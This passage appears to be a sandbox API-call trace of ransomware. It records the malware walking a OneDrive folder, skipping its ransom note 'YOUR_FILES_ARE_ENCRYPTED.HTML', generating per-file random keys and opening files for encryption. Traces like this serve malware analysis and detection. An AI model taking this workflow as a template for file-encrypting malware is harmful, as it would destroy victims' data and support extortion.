param_1="6E") returned 2 [0111.530] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="ED") returned 2 [0111.530] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="8B") returned 2 [0111.530] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="D3") returned 2 [0111.530] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="3A") returned 2 [0111.530] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="6F") returned 2 [0111.530] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="04") returned 2 [0111.530] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="EE") returned 2 [0111.530] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="CB") returned 2 [0111.530] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="F9") returned 2 [0111.530] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="DE") returned 2 [0111.530] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="24") returned 2 [0111.530] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="8D") returned 2 [0111.530] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="95") returned 2 [0111.530] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="84") returned 2 [0111.530] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="AC") returned 2 [0111.530] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="33") returned 2 [0111.530] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="5B") returned 2 [0111.530] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="A2") returned 2 [0111.530] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="3D") returned 2 [0111.530] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="05") returned 2 [0111.531] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="AA") returned 2 [0111.531] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="8F") returned 2 [0111.531] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="35") returned 2 [0111.531] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="42") returned 2 [0111.531] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="48") returned 2 [0111.531] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="21") returned 2 [0111.531] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\CollectOneDriveLogs.bat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\CollectOneDriveLogs.bat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\CollectOneDriveLogs.bat" [0111.531] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.531] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0111.531] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93ea3eb7, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x93ea3eb7, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9404784f, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x72c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ETWlog.dll", cAlternateFileName="")) returned 1 [0111.531] StrStrIW (lpFirst="ETWlog.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.532] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ETWlog.dll") returned 84 [0111.532] PathFindExtensionW (pszPath="ETWlog.dll") returned=".dll" [0111.532] lstrlenW (lpString=".dll") returned 4 [0111.532] PathFindExtensionW (pszPath="ETWlog.dll") returned=".dll" [0111.532] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.532] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ETWlog.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\etwlog.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0111.552] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=29376) returned 1 [0111.552] GetProcessHeap () returned 0x600000 [0111.552] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0111.554] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="A4") returned 2 [0111.554] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="31") returned 2 [0111.554] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="AE") returned 2 [0111.554] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="2E") returned 2 [0111.555] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="A4") returned 2 [0111.555] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="57") returned 2 [0111.555] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="EB") returned 2 [0111.555] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="B9") returned 2 [0111.555] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="CD") returned 2 [0111.555] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="FD") returned 2 [0111.555] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="27") returned 2 [0111.555] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="AF") returned 2 [0111.555] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="38") returned 2 [0111.555] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="5C") returned 2 [0111.555] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="E2") returned 2 [0111.555] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="FB") returned 2 [0111.555] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="B0") returned 2 [0111.555] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="A3") returned 2 [0111.555] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="70") returned 2 [0111.555] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="6F") returned 2 [0111.555] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="FD") returned 2 [0111.555] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="28") returned 2 [0111.555] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="0E") returned 2 [0111.555] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="64") returned 2 [0111.555] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="79") returned 2 [0111.555] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="BB") returned 2 [0111.555] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="6E") returned 2 [0111.555] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="D6") returned 2 [0111.555] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="A2") returned 2 [0111.555] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="55") returned 2 [0111.555] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="55") returned 2 [0111.555] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="77") returned 2 [0111.556] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ETWlog.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ETWlog.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ETWlog.dll" [0111.556] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.556] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0111.556] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94689b47, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x94689b47, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9489fc30, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x4e5f, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ExclusionList.xml", cAlternateFileName="EXCLUS~1.XML")) returned 1 [0111.556] StrStrIW (lpFirst="ExclusionList.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.556] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ExclusionList.xml") returned 91 [0111.556] PathFindExtensionW (pszPath="ExclusionList.xml") returned=".xml" [0111.556] lstrlenW (lpString=".xml") returned 4 [0111.556] PathFindExtensionW (pszPath="ExclusionList.xml") returned=".xml" [0111.556] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.556] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ExclusionList.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\exclusionlist.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0111.556] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=20063) returned 1 [0111.557] GetProcessHeap () returned 0x600000 [0111.557] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0111.561] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="A0") returned 2 [0111.561] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="AD") returned 2 [0111.561] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="0D") returned 2 [0111.561] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="3D") returned 2 [0111.561] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="A8") returned 2 [0111.561] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="F0") returned 2 [0111.561] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="0B") returned 2 [0111.561] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="4B") returned 2 [0111.561] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="D5") returned 2 [0111.561] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="69") returned 2 [0111.561] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="70") returned 2 [0111.561] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="D2") returned 2 [0111.561] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="96") returned 2 [0111.561] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="32") returned 2 [0111.561] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="AC") returned 2 [0111.561] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="8F") returned 2 [0111.561] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="6E") returned 2 [0111.561] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="8A") returned 2 [0111.561] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="B9") returned 2 [0111.561] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="90") returned 2 [0111.561] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="CC") returned 2 [0111.561] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="68") returned 2 [0111.561] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="E2") returned 2 [0111.561] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="08") returned 2 [0111.561] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="3C") returned 2 [0111.561] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="35") returned 2 [0111.561] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="17") returned 2 [0111.561] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="D1") returned 2 [0111.562] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="14") returned 2 [0111.562] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="92") returned 2 [0111.562] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="1E") returned 2 [0111.562] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="18") returned 2 [0111.562] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ExclusionList.xml" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ExclusionList.xml") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ExclusionList.xml" [0111.562] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.562] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0111.562] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94bc0dc5, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x94bc0dc5, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x94ebbc59, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x140c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSync.LocalizedResources.dll", cAlternateFileName="FILESY~1.DLL")) returned 1 [0111.563] StrStrIW (lpFirst="FileSync.LocalizedResources.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.563] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\FileSync.LocalizedResources.dll") returned 105 [0111.563] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll") returned=".dll" [0111.563] lstrlenW (lpString=".dll") returned 4 [0111.563] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll") returned=".dll" [0111.563] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\FileSync.LocalizedResources.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\filesync.localizedresources.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0111.569] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=82112) returned 1 [0111.569] GetProcessHeap () returned 0x600000 [0111.569] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0111.571] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="94") returned 2 [0111.571] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="3D") returned 2 [0111.571] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="6F") returned 2 [0111.571] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="B3") returned 2 [0111.571] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="B1") returned 2 [0111.571] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="E5") returned 2 [0111.571] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="CF") returned 2 [0111.571] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="CD") returned 2 [0111.572] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="DE") returned 2 [0111.572] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="88") returned 2 [0111.572] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="29") returned 2 [0111.572] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="8D") returned 2 [0111.572] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="AE") returned 2 [0111.572] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="80") returned 2 [0111.572] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="FC") returned 2 [0111.572] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="BF") returned 2 [0111.572] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="95") returned 2 [0111.572] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="63") returned 2 [0111.572] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="1C") returned 2 [0111.572] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="C3") returned 2 [0111.572] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="8F") returned 2 [0111.572] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="91") returned 2 [0111.572] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="4D") returned 2 [0111.572] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="48") returned 2 [0111.572] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="CA") returned 2 [0111.572] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="52") returned 2 [0111.572] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="72") returned 2 [0111.572] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="77") returned 2 [0111.572] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="2B") returned 2 [0111.572] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="F3") returned 2 [0111.572] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="4D") returned 2 [0111.572] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="2F") returned 2 [0111.573] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\FileSync.LocalizedResources.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\FileSync.LocalizedResources.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\FileSync.LocalizedResources.dll" [0111.573] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.573] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0111.573] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x959c295b, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x959c295b, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x98355904, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0xf8000, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSync.Resources.dll", cAlternateFileName="FILESY~2.DLL")) returned 1 [0111.573] StrStrIW (lpFirst="FileSync.Resources.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.573] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\FileSync.Resources.dll") returned 96 [0111.573] PathFindExtensionW (pszPath="FileSync.Resources.dll") returned=".dll" [0111.573] lstrlenW (lpString=".dll") returned 4 [0111.573] PathFindExtensionW (pszPath="FileSync.Resources.dll") returned=".dll" [0111.573] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.573] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\FileSync.Resources.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\filesync.resources.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0111.599] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=1015808) returned 1 [0111.599] GetProcessHeap () returned 0x600000 [0111.599] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0111.626] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="D0") returned 2 [0111.626] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="A9") returned 2 [0111.626] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="E4") returned 2 [0111.626] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="BF") returned 2 [0111.626] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="07") returned 2 [0111.627] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="E5") returned 2 [0111.627] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="C2") returned 2 [0111.627] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="FA") returned 2 [0111.627] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="49") returned 2 [0111.627] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="65") returned 2 [0111.627] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="BF") returned 2 [0111.627] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="89") returned 2 [0111.627] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="FD") returned 2 [0111.627] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="F2") returned 2 [0111.627] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="45") returned 2 [0111.627] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="EE") returned 2 [0111.627] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="4B") returned 2 [0111.627] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="58") returned 2 [0111.627] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="CA") returned 2 [0111.627] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="9D") returned 2 [0111.627] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="B0") returned 2 [0111.627] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="52") returned 2 [0111.627] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="CC") returned 2 [0111.627] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="8A") returned 2 [0111.627] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="AB") returned 2 [0111.627] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="0E") returned 2 [0111.627] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="70") returned 2 [0111.627] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="C2") returned 2 [0111.627] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="F5") returned 2 [0111.627] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="E2") returned 2 [0111.627] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="01") returned 2 [0111.627] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="2F") returned 2 [0111.628] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\FileSync.Resources.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\FileSync.Resources.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\FileSync.Resources.dll" [0111.628] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.628] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0111.628] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bbcedb7, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x8bbcedb7, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x8bbcedb7, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="is", cAlternateFileName="")) returned 1 [0111.628] StrStrIW (lpFirst="is", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.628] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is") returned 76 [0111.628] GetProcessHeap () returned 0x600000 [0111.628] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0111.649] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is") 